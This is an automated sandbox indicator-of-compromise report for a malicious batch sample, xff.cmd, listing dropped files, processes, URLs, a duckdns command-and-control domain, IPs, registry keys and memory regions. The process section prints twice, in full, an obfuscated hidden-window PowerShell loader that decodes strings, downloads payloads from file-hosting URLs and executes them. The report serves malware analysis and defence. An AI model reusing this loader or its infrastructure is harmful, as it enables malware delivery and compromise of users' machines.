IOC Report
xff.cmd

loading gif

Files

File Path
Type
Category
Malicious
xff.cmd
ASCII text, with very long lines (6864), with no line terminators
initial sample
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_wab.exe_c37a4ff6c8a4ed9385ea8057619eae3fd5c96a_41d3b116_cdb68d28-d70a-498a-b55d-9a153f3a7274\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF2D5.tmp.dmp
Mini DuMP crash report, 14 streams, Thu May 23 19:11:05 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF4AB.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF50A.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l5ts54qn.5vy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvwr4l2v.4ib.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjn53r1n.xt2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhtjio2f.13m.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K1LU13OLD73QY1LDC9QS.temp
data
dropped
C:\Users\user\AppData\Roaming\Tider.Dre
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
There are 5 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\xff.cmd" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPals,eSkaded Ich.eDaudinKonsu]Wor,h=malap$.emasSTnneskschoooBu,ealSporteHydrak rozeoMa esmOrl,gmNaplei Pa ksAt,rissaucei Rea oSamfunDeprieNo purOpsprnPreceeKlang ');$Bortfjernelsernes=Sideblikkets 'Frems$PensiBLivvaeSa,rabUoveruAlexadAfreteAlimerBjrndnU.odieSvmmes iala.Is.spDForfroBortvw KoolnServilEntreoTelefa,uperdFantoFWillyiSemisl,eroleEng.n(Minid$VelgeDHoldoiTurf s.imssgK shkuEpiscs ,esktIndfdfHealtu AarelCoyot, Bomb$ ProdRAgg.eePostulTydnia Imprt NajaiSpir,v nmarp.ignar TricoLu acn S shoparthmSu areTilban ZincePassir frgenErudieSogne) Akkr ';$Relativpronomenerne=$Mister[0];Mekhitarist (Sideblikkets 'Unrig$KoopegMelanl S,dboDanmabFiskeaSyndflCurcu:DejkrV nobeaTransl Speae B rtr Un,giAer.taHaw nn AfhraCitedtKn.aseVarie=Sha,f(overtTMa.neeFedtesDyrevtK.nsp-familPCoenzaBlgeft P.eehSemit Sej s$ XiphR DavyeGrowsl.ntriadecret Herlia ousvdip op Tegnr.etsbo Be en Skalo SagkmCottoe Elefn KonseEdriar Me.knBaubeeTopno) Tefe ');while (!$Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ') ;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep slamrUdvekoIteminTro.boOakykmChicaeSpecin TugteAppl,rBast.nAlloeeProvo ');Mekhitarist (Sideblikkets 'Bantu$TilingJocunlAnthro Mu kb udv.a KimblEncy :UdbydCTransoSab.enHomagv ShinoBaldulSmeltvRideeuChirol AnaluA,utisObli.e AxilsTrele6 Spid2Fo,la Reasc=Tortu Sekle[ PinaSHoiseyA,falsPyntetFu nee F.rhmV,cef.IndenCAryepoVi sen HavavBrneae Opfyr luertNonau]Grout:Udlic:B,rkeF kinrs ltyo FyrtmFa.veBMagniadyrtisTaurie Chon6 Natu4Che,aSKonjetkluntrE.bedi Plagn ortg Linj(aabne$VitelgTimefa undelStyrmvA.beja.ogren .issoHellit,ebetaLyv.ncM,wkitTiptiil tercCemen) M rq ');Mekhitarist (Sideblikkets 'Frank$Ac,uigOntoglOsculoReelab S lpaUnimpl anti: BrisV vantaSkrivl Tal m,xheauSaveneSu ornOrlan mili=Vintn Malo.[digreS SoppyEnkelsDefi.tTentie WheamPreco.SeksuTPi.ete krivxNavletTalel.TilsmE Minin AlkechovedoDism,d rskoiElencnZygodgUnsca]Gri,g:Gaull:JenhuA ForhSP insCFo.egIkd ndIGenga.,hitfG remteGenertBrndsS KomptLech rAlkaiiKadjanSnabeg Foto( Swip$Nu,woC.laneoHail.nSlikpvLusk oTrolll,trudvBjer,uTaplilSysteuFremrsSnogeeLoka,sInter6Misch2Remrk)Multi ');Mekhitarist (Sideblikkets 'Supe.$Be.aegUnusalCh.kkoSelvobHypnoaGy nolRadic:Tokr,BOver oMah gtKleastAzod,oRhythmHeterlFossieAbbots SyllsDamagnHalakePermusAandes Tibe=Opdal$Dyr mVBroaca,oubllBage m El,kuSemiveGrandnHi le.Aut,ts Ka ruNonfobAerolsMemortSy,edrPeabei VejsnNeepags,lvf(Utilb$InterURottinIncapcSkurkoK.rrei ArthnGilenc MacriG nebd Snu el.quanTunfitAdopt,Flane$CoevaVPrer,aSvangs TrusiRidgef UdsoeSha lrso,thoAlemauPre asDesta)Kursn ');Mekhitarist $Bottomlessness;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPals,eSkaded Ich.eDaudinKonsu]Wor,h=malap$.emasSTnneskschoooBu,ealSporteHydrak rozeoMa esmOrl,gmNaplei Pa ksAt,rissaucei Rea oSamfunDeprieNo purOpsprnPreceeKlang ');$Bortfjernelsernes=Sideblikkets 'Frems$PensiBLivvaeSa,rabUoveruAlexadAfreteAlimerBjrndnU.odieSvmmes iala.Is.spDForfroBortvw KoolnServilEntreoTelefa,uperdFantoFWillyiSemisl,eroleEng.n(Minid$VelgeDHoldoiTurf s.imssgK shkuEpiscs ,esktIndfdfHealtu AarelCoyot, Bomb$ ProdRAgg.eePostulTydnia Imprt NajaiSpir,v nmarp.ignar TricoLu acn S shoparthmSu areTilban ZincePassir frgenErudieSogne) Akkr ';$Relativpronomenerne=$Mister[0];Mekhitarist (Sideblikkets 'Unrig$KoopegMelanl S,dboDanmabFiskeaSyndflCurcu:DejkrV nobeaTransl Speae B rtr Un,giAer.taHaw nn AfhraCitedtKn.aseVarie=Sha,f(overtTMa.neeFedtesDyrevtK.nsp-familPCoenzaBlgeft P.eehSemit Sej s$ XiphR DavyeGrowsl.ntriadecret Herlia ousvdip op Tegnr.etsbo Be en Skalo SagkmCottoe Elefn KonseEdriar Me.knBaubeeTopno) Tefe ');while (!$Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ') ;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep slamrUdvekoIteminTro.boOakykmChicaeSpecin TugteAppl,rBast.nAlloeeProvo ');Mekhitarist (Sideblikkets 'Bantu$TilingJocunlAnthro Mu kb udv.a KimblEncy :UdbydCTransoSab.enHomagv ShinoBaldulSmeltvRideeuChirol AnaluA,utisObli.e AxilsTrele6 Spid2Fo,la Reasc=Tortu Sekle[ PinaSHoiseyA,falsPyntetFu nee F.rhmV,cef.IndenCAryepoVi sen HavavBrneae Opfyr luertNonau]Grout:Udlic:B,rkeF kinrs ltyo FyrtmFa.veBMagniadyrtisTaurie Chon6 Natu4Che,aSKonjetkluntrE.bedi Plagn ortg Linj(aabne$VitelgTimefa undelStyrmvA.beja.ogren .issoHellit,ebetaLyv.ncM,wkitTiptiil tercCemen) M rq ');Mekhitarist (Sideblikkets 'Frank$Ac,uigOntoglOsculoReelab S lpaUnimpl anti: BrisV vantaSkrivl Tal m,xheauSaveneSu ornOrlan mili=Vintn Malo.[digreS SoppyEnkelsDefi.tTentie WheamPreco.SeksuTPi.ete krivxNavletTalel.TilsmE Minin AlkechovedoDism,d rskoiElencnZygodgUnsca]Gri,g:Gaull:JenhuA ForhSP insCFo.egIkd ndIGenga.,hitfG remteGenertBrndsS KomptLech rAlkaiiKadjanSnabeg Foto( Swip$Nu,woC.laneoHail.nSlikpvLusk oTrolll,trudvBjer,uTaplilSysteuFremrsSnogeeLoka,sInter6Misch2Remrk)Multi ');Mekhitarist (Sideblikkets 'Supe.$Be.aegUnusalCh.kkoSelvobHypnoaGy nolRadic:Tokr,BOver oMah gtKleastAzod,oRhythmHeterlFossieAbbots SyllsDamagnHalakePermusAandes Tibe=Opdal$Dyr mVBroaca,oubllBage m El,kuSemiveGrandnHi le.Aut,ts Ka ruNonfobAerolsMemortSy,edrPeabei VejsnNeepags,lvf(Utilb$InterURottinIncapcSkurkoK.rrei ArthnGilenc MacriG nebd Snu el.quanTunfitAdopt,Flane$CoevaVPrer,aSvangs TrusiRidgef UdsoeSha lrso,thoAlemauPre asDesta)Kursn ');Mekhitarist $Bottomlessness;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 2772
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
nmds.duckdns.org
malicious
https://www.sendspace.com/pro/dl/ougyql
104.21.28.80
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://fs03n4.sendspace.com/yK
unknown
https://go.micro
unknown
https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://fs13n3.sendspace.com/dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb
69.31.136.57
http://upx.sf.net
unknown
https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80.bin
69.31.136.17
http://www.sendspace.com
unknown
https://fs03n4.sendspace.com/
unknown
https://github.com/Pester/Pester
unknown
https://www.sendspace.com
unknown
https://www.sendspace.com/
unknown
https://aka.ms/pscore6lB
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://fs03n4.sendspace.com/A
unknown
https://www.sendspace.com/pro/dl/ow9148P
unknown
http://fs13n3.sendspace.com
unknown
https://fs13n3.sendspace.com
unknown
https://aka.ms/pscore68
unknown
https://www.sendspace.com/pro/dl/ow9148
104.21.28.80
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 19 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
nmds.duckdns.org
12.202.180.134
malicious
fs03n4.sendspace.com
69.31.136.17
fs13n3.sendspace.com
69.31.136.57
www.sendspace.com
104.21.28.80

IPs

IP
Domain
Country
Malicious
12.202.180.134
nmds.duckdns.org
United States
malicious
69.31.136.17
fs03n4.sendspace.com
United States
104.21.28.80
www.sendspace.com
United States
69.31.136.57
fs13n3.sendspace.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
ProgramId
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
FileId
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
LowerCaseLongPath
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
LongPathHash
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
Name
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
OriginalFileName
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
Publisher
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
Version
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
BinFileVersion
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
BinaryType
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
ProductName
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
ProductVersion
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
LinkDate
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
BinProductVersion
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
AppxPackageFullName
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
AppxPackageRelativeId
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
Size
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
Language
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
IsOsComponent
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
Usn
There are 24 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
A8FD000
direct allocation
page execute and read and write
malicious
23051000
trusted library allocation
page read and write
malicious
5654000
trusted library allocation
page read and write
malicious
80A0000
direct allocation
page execute and read and write
malicious
2AD51831000
trusted library allocation
page read and write
malicious
2AD417C1000
trusted library allocation
page read and write
229EE000
stack
page read and write
7497000
heap
page read and write
25510000
trusted library allocation
page read and write
2AD410B0000
trusted library allocation
page read and write
7FF7C1A30000
trusted library allocation
page read and write
7497000
heap
page read and write
7FF7C1B10000
trusted library allocation
page read and write
7FF7C19B0000
trusted library allocation
page read and write
32A0000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
252EE000
trusted library allocation
page read and write
CB0000
heap
page read and write
7497000
heap
page read and write
600000
trusted library section
page read and write
7497000
heap
page read and write
2AD3F640000
heap
page read and write
7530000
heap
page readonly
A40000
heap
page read and write
80D0000
direct allocation
page read and write
7030000
trusted library allocation
page read and write
7497000
heap
page read and write
7FF7C19CA000
trusted library allocation
page read and write
22FF0000
trusted library allocation
page read and write
2AD59D34000
heap
page read and write
327D000
trusted library allocation
page execute and read and write
25341000
heap
page read and write
2AD41CBD000
trusted library allocation
page read and write
D4E000
stack
page read and write
68DB000
stack
page read and write
252F1000
trusted library allocation
page read and write
7FF7C1A00000
trusted library allocation
page execute and read and write
540B000
trusted library allocation
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
7497000
heap
page read and write
6B5E000
stack
page read and write
7497000
heap
page read and write
22CE0000
remote allocation
page read and write
7497000
heap
page read and write
AE2ED7D000
stack
page read and write
250E0000
trusted library allocation
page read and write
250E0000
trusted library allocation
page read and write
DDE000
stack
page read and write
6C99000
heap
page read and write
2AD3F850000
trusted library allocation
